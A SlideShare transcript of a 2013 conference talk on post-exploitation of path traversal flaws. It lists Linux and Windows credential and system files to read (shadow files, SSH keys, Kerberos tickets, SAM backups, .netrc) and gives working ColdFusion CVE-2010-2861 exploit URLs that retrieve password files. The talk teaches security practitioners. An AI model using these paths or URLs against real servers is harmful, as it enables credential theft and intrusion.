SlideShare a Scribd company logo

4.1. Path traversal post_exploitation

defconmoscow
defconmoscow

Meeting #4.

Internet
1 of 22
Download to read offline
Path traversal post exploitation By George Lagoda Nov 23, 2013
This slide intentionally left blank (always dreamed of it )
Common understanding of path traversal A Path Traversal attack aims to access files and directories that are stored outside the web root folder. (OWASP) WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
/etc/passwd – why so special?
Y.O.B.A. hacking NEXT STEPS 1. /root/.bash_history if not accessible try harder: /home/username/.bash_history game me:
Looks like epic win??: After analyzing prepare_release.sh:
.netrc file • Provides remember me for ftp What I had when checked /home/username/.netrc : machine ftp.server.com login secret_usr password secret_pwd
Help for shell uploading /proc/self/environ /proc/self/status Useful if we wanna find access or error logs of Apache, document root of the server or we also have LFI and wanna exploit Apache log poisoning
Smtg fo crds • SSH keys, often passwordless: /home/*/.ssh/id* • Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab • PGP keys: /home/*/.gnupg/secring.gpgs
What distro we have? • /etc/SUSE-release # Novell SUSE • /etc/redhat-release, /etc/redhat_version # Red Hat • /etc/fedora-release # Fedora • /etc/slackware-release, • /etc/slackware-version # Slackware • /etc/debian_release, /etc/debian_version # Debian • /etc/mandrake-release # Mandrake • /etc/sun-release # Sun JDS • /etc/release # Solaris/Sparc • /etc/gentoo-release # Gentoo • /etc/arch-release # Arch Linux (file will be empty) • arch # OpenBSD; sample: “OpenBSD.amd64”
What about windows?
File Expected Contents / Description %SYSTEMDRIVE%boot.ini A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. %WINDIR%win.ini This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case. %SYSTEMROOT%repairSAM %SYSTEMROOT%System32configR egBackSAM It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in repair is locked, but can be retired using forensic or Volume Shadow copy methods %SYSTEMROOT%repairsystem %SYSTEMROOT%System32configR egBacksystem %SYSTEMDRIVE%autoexec.bat
%SYSTEMDRIVE%pagefile.sys Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size %WINDIR%system32logfileshttperrhttperr1.log IIS 6 error log %SystemDrive%inetpublogsLogFiles IIS 7’s logs location %WINDIR%system32logfilesw3svc1exY YMMDD.log (year month day) %WINDIR%system32configAppEvent.Evt %WINDIR%system32configSecEvent.Evt %WINDIR%system32configdefault.sav %WINDIR%system32configsecurity.sav %WINDIR%system32configsoftware.sav %WINDIR%system32configsystem.sav %WINDIR%system32CCMlogs*.log %USERPROFILE%ntuser.dat
U really thought I will forget bout kittens?
• /etc/passwd • /etc/shadow (gotta try..) • /etc/shadow~ # (sometimes there when edited with gedit) • /etc/master.passwd • /etc/group • /etc/hosts • /etc/crontab • /etc/sysctl.conf • /etc/resolv.conf • /etc/samba/smb.conf • /etc/exports • /etc/auto.master • /etc/auto_maste • /etc/fstab • /etc/exports • /etc/sudoers
Some SW defaults http://wiki.apache.org/httpd/DistrosDefaultLay out
Also for cold fusion(not the last vers but still) ColdFusion 6: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword. properties%00en ColdFusion 7: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpasswor d.properties%00en ColdFusion 8 http://site/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpasswor d.properties%00en All versions: http://site/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusio ncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en http://www.cvedetails.com/cve/CVE-2010-2861/
• In case if you still don’t have path traversal to post exploit it, may be this tool could be useful for you: http://dotdotpwn.blogspot.ru/
Why so serious?
Thank you for visiting us And HACK YOU  (the end).

Recommended

Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Securityn|u - The Open Security Community
 
OOP Language Powerpoint
OOP Language PowerpointOOP Language Powerpoint
OOP Language PowerpointAngelia Nicole Dela Cruz
 
Computer Forensics & Windows Registry
Computer Forensics & Windows RegistryComputer Forensics & Windows Registry
Computer Forensics & Windows Registrysomutripathi
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetJuan F. Padilla
 
Windows Registry Analysis
Windows Registry AnalysisWindows Registry Analysis
Windows Registry AnalysisHimanshu0734
 
Registry Forensics
Registry ForensicsRegistry Forensics
Registry ForensicsSomesh Sawhney
 
Namespaces and Autoloading
Namespaces and AutoloadingNamespaces and Autoloading
Namespaces and AutoloadingVic Metcalfe
 

Recommended

Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Securityn|u - The Open Security Community
 
OOP Language Powerpoint
OOP Language PowerpointOOP Language Powerpoint
OOP Language PowerpointAngelia Nicole Dela Cruz
 
Computer Forensics & Windows Registry
Computer Forensics & Windows RegistryComputer Forensics & Windows Registry
Computer Forensics & Windows Registrysomutripathi
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetJuan F. Padilla
 
Windows Registry Analysis
Windows Registry AnalysisWindows Registry Analysis
Windows Registry AnalysisHimanshu0734
 
Registry Forensics
Registry ForensicsRegistry Forensics
Registry ForensicsSomesh Sawhney
 
Namespaces and Autoloading
Namespaces and AutoloadingNamespaces and Autoloading
Namespaces and AutoloadingVic Metcalfe
 
Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkKapil Soni
 
Unit 7
Unit 7Unit 7
Unit 7siddr
 
4.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v24.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v2Acácio Oliveira
 
File System Hierarchy
File System HierarchyFile System Hierarchy
File System Hierarchysritolia
 
Flashack
FlashackFlashack
Flashackn|u - The Open Security Community
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploitOWASP (Open Web Application Security Project)
 
Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Bandit S
 
File management in C++
File management in C++File management in C++
File management in C++apoorvaverma33
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssolaonap166
 
Fundamentals, ORM and Security
Fundamentals, ORM and Security Fundamentals, ORM and Security
Fundamentals, ORM and Security Tarikul Islam
 
File_Management_in_C
File_Management_in_CFile_Management_in_C
File_Management_in_CNabeelaNousheen
 
File Management in C
File Management in CFile Management in C
File Management in CMunazza-Mah-Jabeen
 
Fluentd introduction at ipros
Fluentd introduction at iprosFluentd introduction at ipros
Fluentd introduction at iprosTreasure Data, Inc.
 
File system hiearchy
File system hiearchyFile system hiearchy
File system hiearchysritolia
 
Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalationJameel Nabbo
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesPhil Hagen
 
Linux filesystemhierarchy
Linux filesystemhierarchyLinux filesystemhierarchy
Linux filesystemhierarchyDr. C.V. Suresh Babu
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014Nabil Munawar
 
What every data programmer needs to know about disks
What every data programmer needs to know about disksWhat every data programmer needs to know about disks
What every data programmer needs to know about disksiammutex
 
Tutorial 2
Tutorial 2Tutorial 2
Tutorial 2tech2click
 
Working with core dump
Working with core dumpWorking with core dump
Working with core dumpThierry Gayet
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Puppet
 

More Related Content

What's hot

Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkKapil Soni
 
Unit 7
Unit 7Unit 7
Unit 7siddr
 
4.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v24.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v2Acácio Oliveira
 
File System Hierarchy
File System HierarchyFile System Hierarchy
File System Hierarchysritolia
 
Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Bandit S
 
File management in C++
File management in C++File management in C++
File management in C++apoorvaverma33
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssolaonap166
 
Fundamentals, ORM and Security
Fundamentals, ORM and Security Fundamentals, ORM and Security
Fundamentals, ORM and Security Tarikul Islam
 
File system hiearchy
File system hiearchyFile system hiearchy
File system hiearchysritolia
 

What's hot (14)

Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility Framework
 
Unit 7
Unit 7Unit 7
Unit 7
 
4.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v24.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v2
 
File System Hierarchy
File System HierarchyFile System Hierarchy
File System Hierarchy
 
Flashack
FlashackFlashack
Flashack
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploit
 
Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0
 
File management in C++
File management in C++File management in C++
File management in C++
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark sso
 
Fundamentals, ORM and Security
Fundamentals, ORM and Security Fundamentals, ORM and Security
Fundamentals, ORM and Security
 
File_Management_in_C
File_Management_in_CFile_Management_in_C
File_Management_in_C
 
File Management in C
File Management in CFile Management in C
File Management in C
 
Fluentd introduction at ipros
Fluentd introduction at iprosFluentd introduction at ipros
Fluentd introduction at ipros
 
File system hiearchy
File system hiearchyFile system hiearchy
File system hiearchy
 

Similar to 4.1. Path traversal post_exploitation

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalationJameel Nabbo
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesPhil Hagen
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014Nabil Munawar
 
What every data programmer needs to know about disks
What every data programmer needs to know about disksWhat every data programmer needs to know about disks
What every data programmer needs to know about disksiammutex
 
Working with core dump
Working with core dumpWorking with core dump
Working with core dumpThierry Gayet
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Puppet
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guideCraig Cannon
 
Linux Common Command
Linux Common CommandLinux Common Command
Linux Common CommandJeff Yang
 
Live memory forensics
Live memory forensicsLive memory forensics
Live memory forensicsMehedi Hasan
 
Using filesystem capabilities with rsync
Using filesystem capabilities with rsyncUsing filesystem capabilities with rsync
Using filesystem capabilities with rsyncHazel Smith
 
Root file system for embedded systems
Root file system for embedded systemsRoot file system for embedded systems
Root file system for embedded systemsalok pal
 
Lamp1
Lamp1Lamp1
Lamp1Reka
 
Lamp
LampLamp
LampReka
 
CASPUR Staging System II
CASPUR Staging System IICASPUR Staging System II
CASPUR Staging System IIAndrea PETRUCCI
 

Similar to 4.1. Path traversal post_exploitation (20)

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalation
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management Databases
 
Linux filesystemhierarchy
Linux filesystemhierarchyLinux filesystemhierarchy
Linux filesystemhierarchy
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
 
What every data programmer needs to know about disks
What every data programmer needs to know about disksWhat every data programmer needs to know about disks
What every data programmer needs to know about disks
 
Tutorial 2
Tutorial 2Tutorial 2
Tutorial 2
 
Working with core dump
Working with core dumpWorking with core dump
Working with core dump
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
 
Linux Common Command
Linux Common CommandLinux Common Command
Linux Common Command
 
Live memory forensics
Live memory forensicsLive memory forensics
Live memory forensics
 
Mem forensic
Mem forensicMem forensic
Mem forensic
 
Using filesystem capabilities with rsync
Using filesystem capabilities with rsyncUsing filesystem capabilities with rsync
Using filesystem capabilities with rsync
 
Edubooktraining
EdubooktrainingEdubooktraining
Edubooktraining
 
Root file system for embedded systems
Root file system for embedded systemsRoot file system for embedded systems
Root file system for embedded systems
 
Solaris_quickref.pdf
Solaris_quickref.pdfSolaris_quickref.pdf
Solaris_quickref.pdf
 
Lamp1
Lamp1Lamp1
Lamp1
 
Lamp1
Lamp1Lamp1
Lamp1
 
Lamp
LampLamp
Lamp
 
CASPUR Staging System II
CASPUR Staging System IICASPUR Staging System II
CASPUR Staging System II
 

More from defconmoscow

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRLdefconmoscow
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]defconmoscow
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2defconmoscow
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hackingdefconmoscow
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenmentdefconmoscow
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF finaldefconmoscow
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jaildefconmoscow
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websitesdefconmoscow
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protectiondefconmoscow
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6defconmoscow
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communicationsdefconmoscow
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensicsdefconmoscow
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]defconmoscow
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecryptdefconmoscow
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]defconmoscow
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardwaredefconmoscow
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditionsdefconmoscow
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddlerdefconmoscow
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypotdefconmoscow
 

More from defconmoscow (20)

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRL
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenment
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF final
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communications
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensics
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditions
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddler
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypot
 
3.2. White hat
3.2. White hat3.2. White hat
3.2. White hat
 

Recently uploaded

'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...aditipandeya
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts servicesonalikaur4
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
Call Girls in East Of Kailash 9711199171 Delhi Enjoy Call Girls With Our Escorts
Call Girls in East Of Kailash 9711199171 Delhi Enjoy Call Girls With Our EscortsCall Girls in East Of Kailash 9711199171 Delhi Enjoy Call Girls With Our Escorts
Call Girls in East Of Kailash 9711199171 Delhi Enjoy Call Girls With Our Escortsindian call girls near you
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneCall girls in Ahmedabad High profile
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Roomdivyansh0kumar0
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)Damian Radcliffe
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Deliverybabeytanya
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...SofiyaSharma5
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Roomishabajaj13
 

Recently uploaded (20)

'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
 
Vip Call Girls Aerocity ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Aerocity ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Aerocity ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Aerocity ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Call Girls in East Of Kailash 9711199171 Delhi Enjoy Call Girls With Our Escorts
Call Girls in East Of Kailash 9711199171 Delhi Enjoy Call Girls With Our EscortsCall Girls in East Of Kailash 9711199171 Delhi Enjoy Call Girls With Our Escorts
Call Girls in East Of Kailash 9711199171 Delhi Enjoy Call Girls With Our Escorts
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
